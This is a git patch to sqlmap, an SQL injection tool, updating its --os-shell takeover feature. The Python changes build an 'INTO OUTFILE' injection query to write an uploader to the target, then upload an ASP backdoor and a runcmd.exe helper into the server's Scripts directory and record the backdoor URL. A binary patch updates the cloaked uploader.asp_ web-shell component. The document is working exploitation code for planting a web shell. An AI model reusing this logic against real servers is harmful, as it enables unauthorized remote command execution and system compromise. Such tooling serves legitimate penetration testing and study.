From 24d3e24db01a4c8421f517c343b4210b5fb6c8c2 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 25 Feb 2010 12:16:49 +0000
Subject: [PATCH] more updates regarding --os-shell feature

---
 lib/takeover/web.py |  33 ++++++++++++++++-----------------
 shell/uploader.asp_ | Bin 1223 -> 1262 bytes
 2 files changed, 16 insertions(+), 17 deletions(-)

diff --git a/lib/takeover/web.py b/lib/takeover/web.py
index 0a630adb5..4eb61c9bd 100644
--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
@@ -111,7 +111,7 @@ class Web:
 
     def __webFileInject(self, fileContent, fileName, directory):
         outFile     = posixpath.normpath("%s/%s" % (directory, fileName))
-        uplQuery    = fileContent.replace("WRITABLE_DIR", directory.replace('/', '\\\\') if kb.os == "Windows" else directory)
+        uplQuery    = fileContent.replace("WRITABLE_DIR", directory.replace('/', '\\') if kb.os == "Windows" else directory)
         query       = " LIMIT 1 INTO OUTFILE '%s' " % outFile
         query      += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
         query       = agent.prefixQuery(" %s" % query)
@@ -200,24 +200,23 @@ class Web:
             logger.info(infoMsg)
             
             if self.webApi == "asp":
-                scriptsDirectory = "Scripts"
                 runcmdName = "tmpe%s.exe" % randomStr(4)
                 runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'), runcmdName)
-                backdoorUploaded = False
-                for backdoorDirectoryFormat in ("%s.\%s", "%s..\%s", "%s..\..\%s"):
-                    backdoorDirectory = backdoorDirectoryFormat % (posixToNtSlashes(directory), scriptsDirectory)
-                    backdoorContent = originalBackdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName)
-                    backdoorStream.file.truncate()
-                    backdoorStream.read()
-                    backdoorStream.seek(0)
-                    backdoorStream.write(backdoorContent)
-                    if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
-                        self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
-                        self.webBackdoorUrl = "%s/%s/%s" % (self.webBaseUrl.rstrip('/'), scriptsDirectory, backdoorName)
-                        self.webDirectory = backdoorDirectory
-                        backdoorUploaded = True
-                        break
-                if not backdoorUploaded:
+                match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage)
+                if match:
+                    backdoorDirectory = match.group(1)
+                else:
+                    continue
+                backdoorContent = originalBackdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName)
+                backdoorStream.file.truncate()
+                backdoorStream.read()
+                backdoorStream.seek(0)
+                backdoorStream.write(backdoorContent)
+                if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
+                    self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
+                    self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl.rstrip('/'), backdoorName)
+                    self.webDirectory = backdoorDirectory
+                else:
                     continue
             elif not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory):
                 warnMsg  = "backdoor hasn't been successfully uploaded "
diff --git a/shell/uploader.asp_ b/shell/uploader.asp_
index d91b4c706e296360ebe83f40a5f62b1a680a8012..6ca1cee1ea43ae47bba5deaa3510dfeba89fd6ba 100644
GIT binary patch
literal 1262
zcmV<K1QGi^B^O3cJ|<Z#CN9u#T7P{}-+)d>ED-%@K=1#AzxV&(FM0&qMe9+k3TKX*
z&7{Fwkdquc7Ncu<o})j|d_Q@b7k?WvcA=Egd4oR}7k;38KYx3OHx-_w2hwZvEL{Z^
z1%?%2r>W`|hKYb#nC5?sY;SXYADT^NXM4eCm^-0+RRE$ESm~0RFa1rYk?DH{o|9jH
z^q7o)YP0sH1tIe|c*@fm1D^=GTA<|$E*6YujyNf8y)wTPBMM>q9tlHM;|2jm&DFI7
zfU3YUurICFm9v><(U`0#hW_HNhyfw+wk8-1^wP}zf*DtAMC+x2l1Jhv)u@1nWUbMt
z;N3bIuETp$w8$opNmXne21o~yS)+p*U_+L4Xe-f<G5y#gYk+G#V?EH$lN(-|_Q8zc
z8RvJ2DuwIkdKAx@hhozaW1bDXVG+;Tyd(&XAz`d(jS5nOB}>MJ)I}1a`uNx|ug7Iz
zDt6WjOB-}-zgmGWfaB6VEyuPQqE=|OAoYzI?d)8jj2-i5MB#10;@66EU8-{-a*-T+
z9jK*lI}J#6qn5K+ku<D5;MRjDO|d&&fjwU*b)t473pg&9dbW3@fg{WsIXc^3@2oCY
zpJas}@BVG`)vumzxe<oHB6Dk!MWNFwLA-6qJw`&5eR?cCXv&;iQhE|$pNo&XYfQ!K
z-~PjeCSXp8xSqHT<NVlt+_^b~M9B)~gG}{rvFKeVce|W3QZrmTBPUG!z^1xs&+XHt
z(igTxPIW8Y#Guq^(lDWAK3c6Dp%dPx8VmWgosK;nbdi5nn<rgk5J%EQ+D;s*b!bc#
zC5J)$g+Dyk>)^!m#K#zu5Q)1k29qe9hO1~ipb%un+^$fSmqT7rI_#AJ!v0p`O+9bh
zCVoChL;}?)UJwL}&VC3^oY6J;-kySPT|U%I%nR()DYnSU9h(CCbVg+tH%m%}!-aG3
z(=0f!#~h|zB>h6sT?M<Lc6X-#IauN!0ANOeev;&>0lW+wWWex2Mfg0^&wItlj<wBw
zvW^d>sB(hOjG56+SS`v6Tq`$oKH4vrKrbcPMDM-2K4VTsjg>JtatBr}QJjP_R-!NL
zH`Sn$l%~gV6Fz}mO#-w<)4X=0?tZ;7ps(JTStwF`PhR){BV!)9Pr&va8}of^j(-I%
zM(?m0?DUT5t2h8aU!_Q$38i5|rzH+&p?h6tAbt~$JJ-88zDvw|e;&9Hm6l^SPV?%?
zF7#<kUXnjuXYhK(&WVF~7aEm;vfvPepE5kNfJ2S2L)0$tU1>o>fD-EoAC6}CiFW!W
z$w`H#1Ks6_AwUk2*<N!u4~|*Kj0?>@#o5N$a$U%TX{d#hw0)rt9a~mE!l`Gj-hNKd
zL4h}sHC8FIaY)?SGq#ldKa!p^nJDJru7QE4cD7fJu<SRpz!_|Of5+le4m7A(Z$3IZ
zJ0fqm(%L4~j%ngV<sa3lrB3epa8ZMLU{(78F*1iY5Mxx+rBzz-E_WP#nl@sp1^N=q
zu;M(yWd-1G5wLkI|Ag`q4r@}^!YiscS$>IAa;$oSYG?AuYB2&ud|jb#oq`#?5~l6O
zQhZAJ+=n_>>%(Xwykme}jvl*hXg%x(qR5<qa_<Oa`#MKmLwo>4Q+wesAsuQ0VRc?c
YTumFTX-g==9&P_<4LV0JkS@?~T2j?m)Bpeg

literal 1223
zcmV;&1UUOWB^O3cJ|<Z#CVvbGo_~E@-+)d>ED-%@K=1#AzxV&(FM3825|#z(%()k6
zOR$n#Su>hVFl|j7H<%V>XFNWMv^kn~UVG6j@p?-Esp(4vk1tDjsDFQdc5jd@R-?(F
zIO;!5O?f|Ofto*Kz;1#aet<J<IXpanm|Sdklv+YEsP!-wT*QWrVWWG0^-F($dcbwr
zzUiMhu+gg`rp(s*KyFfbF{)Bd3~s*VPR=#HwH#csP_|)5*A59~a_Onsdy+G5y2OP5
zd;WN2Jrqo5#`fpBsJ&O9P@V-LjoBus&>bD2Ofsr9g~-w2hAfca?E9y~OryFxuqhv+
zY1vQfPxDSMn{2_n9Xp!UqA|>BmF}sc{9!_7GVMRfk#_@@Mjcm-_p0MOXM(pP)t}Ci
zmJ9#{&ywbzbU+Z!WfYjFhZBmXBsJM9$%Z^l2?QchosoX0d`*G)ay4uoJmt=lc6oLE
z(ruPPOiFGywC?^h%+mTm9|gUk=+>jdd@7epTPoZtnoq2iWj5K<OqJtN2p0s^ri`^8
z%61ES2d#sYt8Ym<#%PH+am$^Wjm-Ir-d&ADRdaJBUgs#HF0NQEg|5`()ac(N?#q&*
zI(>ZFL-x_ZcJPsLx0rx|C(%@kBXJdrnov^GE<0i0#bQ1kjbR*joEa;Xl<ClX*awJ-
zOe@UoucHC<2mXc6eh4yiI)eun$!Y@r4=1H`>G1gZL11L&s=+=z83$j+Zr6PDLC0U5
z<_{(BlQJeqNu!HD9WMB=S=$GS2d23sd7RKAT^sP1LUXLD9WRr|(+*b5$d=5v5lkFg
zPFEy(Op!@NJ)o#o49ufEF&tWR{+l56O7O>mvs(!8J%Z&Sitgc<-}WlF)*6w4y*2Z_
z0y|whgPa&n*VCM>5{Zo6G60QQoH3<#d4_<}6QP7wfj}Noik3ZH^g*nKaE8`r8D}}X
zc<_+#$~RA07tw$7*;0O}akJN2><APMa8K{jv`3>btWunEe7&r#2WL~Y9u^)<(x5(a
zrG@SddS>=Xw83N!M~#&+IC2OUE>WC>GFGB5>^Ie*nk{i-*c~6*Yyr4KSLJ@__J8hH
z#9<4)PO{KUePTc%>4Zl;`^~$iQ9psUAAF&At~Y`aL4g<(4E(F+cmf*nM6OXi^bT_`
zf^Ky8UrfI{$J82;Z=hlnjw~j^3!&xV&7}Q#xoum3J5bnkvB7Qjai?Pwa+2`wG1WYi
zA3}MkW7IC%J5vBfe-h*i-g5X3iFVBj%U?re-TWlON<$kJD^_}1Y%7GmoRzB`?0MLY
zUC4xKpoNo^eW4B=T9&X1S)JVAPxEB@czQ*t)daC|id)i|7Ay6AHJn2PD6Ydrd3mHx
z7pmaxZkxCnY<z#l@iJk1^m}Ss?(Yp_(Nd(^EJk<(HZGDc9gDmBjw5xXQ7Z+%t7={w
zWW^`bU#Odr7CVG13AF6B>szWC@StA94|rMt!DSN|26U+vJ%TsVfh}ipjD4bOiuIs(
zIjpdAH+ek~(2Fis8q-lKbS?FWum~mV4bc*=Uv4;0+$CwhSF(6VUdHqj+~i|ES*#Ek
l=YcKD)z~{5aph;7T&+zdg{)EKNQA%Q?l-4(ZGUkQ)4<fFOpE{k